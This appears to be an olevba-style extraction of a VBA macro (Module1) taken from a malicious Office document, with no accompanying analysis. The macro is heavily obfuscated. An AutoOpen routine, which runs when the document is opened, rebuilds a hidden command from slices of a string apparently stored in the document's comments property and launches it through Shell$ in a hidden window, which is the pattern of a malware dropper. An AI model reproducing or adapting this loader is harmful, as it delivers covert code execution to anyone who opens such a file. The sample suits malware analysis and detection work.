Filename     : ./macros/b63af7ccb9092448a0904f97c7640db8e9361927cdecb2ca04bdc36108b4cc37
OLE stream   : Macros/VBA/Module1
VBA filename : Module1.bas
----------------------------------------
Attribute VB_Name = "Module1"
Sub MMwjqzDvB()
YqzUmnbOZ = "" + dXsXoj + PilMzFj + DQZkHdNr + qLiVKdki + BSGsa + lTWHUG + dXICzQMT + PfzjdAIE + iwEQl + qBwnH + XpwhK + IiTVk + "coMments" + dXsXoj + PilMzFj + DQZkHdNr + qLiVKdki + BSGsa + lTWHUG + dXICzQMT + PfzjdAIE + iwEQl + qBwnH + XpwhK + IiTVk + Cavtul + RGSbw + HWrIPO + fJIHivq + jWzcUR
MCTbubcFi = Right(Left((PkWfVndSE(YqzUmnbOZ)), 6157), 72)
cJGRLF = Mid((PkWfVndSE(YqzUmnbOZ)), 10573, 108)
TzuLiE = Mid((PkWfVndSE(YqzUmnbOZ)), 8153, 75)
sTbCwJHDcb = Right(Left((PkWfVndSE(YqzUmnbOZ)), 9635), 135)
ETZcDasCGj = Right(Left((PkWfVndSE(YqzUmnbOZ)), 721), 77)
ZDokR = Right(Left((PkWfVndSE(YqzUmnbOZ)), 5089), 77)
WplkmCPOTB = Right(Left((PkWfVndSE(YqzUmnbOZ)), 8690), 68)
jjwJAZSIEM = Right(Left((PkWfVndSE(YqzUmnbOZ)), 3705), 21)
LbUcsUXml = Mid((PkWfVndSE(YqzUmnbOZ)), 14907, 97)
BSjnZoLYADs = Mid((PkWfVndSE(YqzUmnbOZ)), 7584, 135)
cuoKzijK = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 11877), 72)
ZKhmV = Mid((PkWfVndSE(YqzUmnbOZ)), 740, 134)
QCwkvqRms = Mid((PkWfVndSE(YqzUmnbOZ)), 3997, 22)
nCiTTzzwjMm = Right(Left((PkWfVndSE(YqzUmnbOZ)), 5541), 123)
pOQJc = Mid((PkWfVndSE(YqzUmnbOZ)), 15898, 147)
qaWnp = Mid((PkWfVndSE(YqzUmnbOZ)), 2730, 103)
hDWYHOrWkX = Mid((PkWfVndSE(YqzUmnbOZ)), 12852, 109)
kmXSSdztvj = Mid((PkWfVndSE(YqzUmnbOZ)), 11217, 111)
JASCNf = Right(Left((PkWfVndSE(YqzUmnbOZ)), 13087), 95)
HLSuJofp = Right(Left((PkWfVndSE(YqzUmnbOZ)), 12383), 120)
isDkHOS = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 10699), 23)
KqSrB = Mid((PkWfVndSE(YqzUmnbOZ)), 5661, 122)
OGvoIEj = Mid((PkWfVndSE(YqzUmnbOZ)), 6274, 125)
ZUdIdzJhc = Right(Left((PkWfVndSE(YqzUmnbOZ)), 3049), 82)
DZtEjFcjm = Mid((PkWfVndSE(YqzUmnbOZ)), 14745, 2)
QQtaZtX = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 10426), 133)
LbAitpza = Mid((PkWfVndSE(YqzUmnbOZ)), 14411, 65)
kOzuLpNrF = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 5814), 25)
zquFDMOD = Mid((PkWfVndSE(YqzUmnbOZ)), 14641, 9)
ckWoQawYXj = MCTbubcFi + cJGRLF + TzuLiE + sTbCwJHDcb + ETZcDasCGj + ZDokR + WplkmCPOTB + jjwJAZSIEM + LbUcsUXml + BSjnZoLYADs + cuoKzijK + ZKhmV + QCwkvqRms + nCiTTzzwjMm + pOQJc + qaWnp + hDWYHOrWkX + kmXSSdztvj + JASCNf + HLSuJofp + isDkHOS + KqSrB + OGvoIEj + ZUdIdzJhc + DZtEjFcjm + QQtaZtX + LbAitpza + kOzuLpNrF + zquFDMOD
LwafkqAnq = Mid((PkWfVndSE(YqzUmnbOZ)), 5555, 93)
LNsKdLr = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 11449), 121)
UQVffpdHs = Right(Left((PkWfVndSE(YqzUmnbOZ)), 12191), 74)
UJVFKXfAPcC = Right(Left((PkWfVndSE(YqzUmnbOZ)), 5299), 44)
DdChm = Mid((PkWfVndSE(YqzUmnbOZ)), 14205, 101)
swUMub = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 2615), 11)
uMsvt = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 11141), 12)
BsnAGfqCFRi = Mid((PkWfVndSE(YqzUmnbOZ)), 13785, 47)
CmvVzlGV = Right(Left((PkWfVndSE(YqzUmnbOZ)), 2492), 42)
KjcfFD = Mid((PkWfVndSE(YqzUmnbOZ)), 1154, 145)
sUEbKu = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 12432), 52)
jBvPvPITwH = Right(Left((PkWfVndSE(YqzUmnbOZ)), 4969), 7)
zHcdMjcR = Right(Left((PkWfVndSE(YqzUmnbOZ)), 2607), 60)
kzVJl = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 10235), 146)
acAkIEEZ = Right(Left((PkWfVndSE(YqzUmnbOZ)), 1498), 1)
uaJjwm = Right(Left((PkWfVndSE(YqzUmnbOZ)), 3250), 101)
lsbOaS = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 391), 65)
jQwtmd = Mid((PkWfVndSE(YqzUmnbOZ)), 918, 89)
AFvMCiQzYnd = ckWoQawYXj + LwafkqAnq + LNsKdLr + UQVffpdHs + UJVFKXfAPcC + DdChm + swUMub + uMsvt + BsnAGfqCFRi + CmvVzlGV + KjcfFD + sUEbKu + jBvPvPITwH + zHcdMjcR + kzVJl + acAkIEEZ + uaJjwm + lsbOaS + jQwtmd
PNITVaU = Right(Left((PkWfVndSE(YqzUmnbOZ)), 10815), 73)
YbDldpM = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 9134), 110)
kmdFALciW = Mid((PkWfVndSE(YqzUmnbOZ)), 11045, 92)
jaGvQaHLT = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 156), 74)
fTkXkwwmH = Right(Left((PkWfVndSE(YqzUmnbOZ)), 13500), 13)
uwonKM = Mid((PkWfVndSE(YqzUmnbOZ)), 4405, 84)
nDcClzVIUD = Mid((PkWfVndSE(YqzUmnbOZ)), 15615, 143)
KrBHJ = Right(Left((PkWfVndSE(YqzUmnbOZ)), 2950), 43)
ailkjTaj = Mid((PkWfVndSE(YqzUmnbOZ)), 2178, 72)
cQuNd = Mid((PkWfVndSE(YqzUmnbOZ)), 568, 29)
CRzZPqbjZ = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 5119), 36)
CujiojXMCTs = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 11600), 33)
RLAsmn = Mid((PkWfVndSE(YqzUmnbOZ)), 7728, 39)
nWEsWDKoJ = Right(Left((PkWfVndSE(YqzUmnbOZ)), 4319), 102)
HadPaw = Mid((PkWfVndSE(YqzUmnbOZ)), 8700, 53)
qRBKJi = Right(Left((PkWfVndSE(YqzUmnbOZ)), 10150), 72)
EpjwmY = Mid((PkWfVndSE(YqzUmnbOZ)), 14696, 1)
XblSjMY = Right(Left((PkWfVndSE(YqzUmnbOZ)), 7121), 138)
ibknvau = Right(Left((PkWfVndSE(YqzUmnbOZ)), 1868), 8)
vPlLvKhu = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 14071), 47)
ZDXjIOrwMIi = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 9273), 5)
TPLsbZEb = AFvMCiQzYnd + PNITVaU + YbDldpM + kmdFALciW + jaGvQaHLT + fTkXkwwmH + uwonKM + nDcClzVIUD + KrBHJ + ailkjTaj + cQuNd + CRzZPqbjZ + CujiojXMCTs + RLAsmn + nWEsWDKoJ + HadPaw + qRBKJi + EpjwmY + XblSjMY + ibknvau + vPlLvKhu + ZDXjIOrwMIi
RWcUUDdYzjk = Right(Left((PkWfVndSE(YqzUmnbOZ)), 10220), 45)
GFjfRl = Mid((PkWfVndSE(YqzUmnbOZ)), 7962, 50)
YUpcPOcwEm = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 4617), 41)
MLjCrMYGN = Mid((PkWfVndSE(YqzUmnbOZ)), 13284, 47)
jzzlWpYJwi = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 15227), 108)
CmrEoBcswbi = Mid((PkWfVndSE(YqzUmnbOZ)), 9781, 90)
YhoFMRiPiGf = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 2130), 3)
FGjdLFGR = Mid((PkWfVndSE(YqzUmnbOZ)), 11371, 2)
OvqzH = TPLsbZEb + RWcUUDdYzjk + GFjfRl + YUpcPOcwEm + MLjCrMYGN + jzzlWpYJwi + CmrEoBcswbi + YhoFMRiPiGf + FGjdLFGR
NbiXfMmLw = Mid((PkWfVndSE(YqzUmnbOZ)), 3678, 1)
TQdvdu = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 15388), 1)
zdMtzlzQWm = Left(Right((PkWfVndSE(YqzUmnbOZ)), Len((PkWfVndSE(YqzUmnbOZ))) - 3758), 1)
rinGkmVY = OvqzH + NbiXfMmLw + TQdvdu + zdMtzlzQWm
Shell$ "" + dXsXoj + PilMzFj + DQZkHdNr + qLiVKdki + rinGkmVY + dXsXoj + PilMzFj + DQZkHdNr + qLiVKdki + BSGsa + lTWHUG + dXICzQMT + PfzjdAIE + DbzqL, 0
End Sub
Sub AutoOpen()
MMwjqzDvB
End Sub

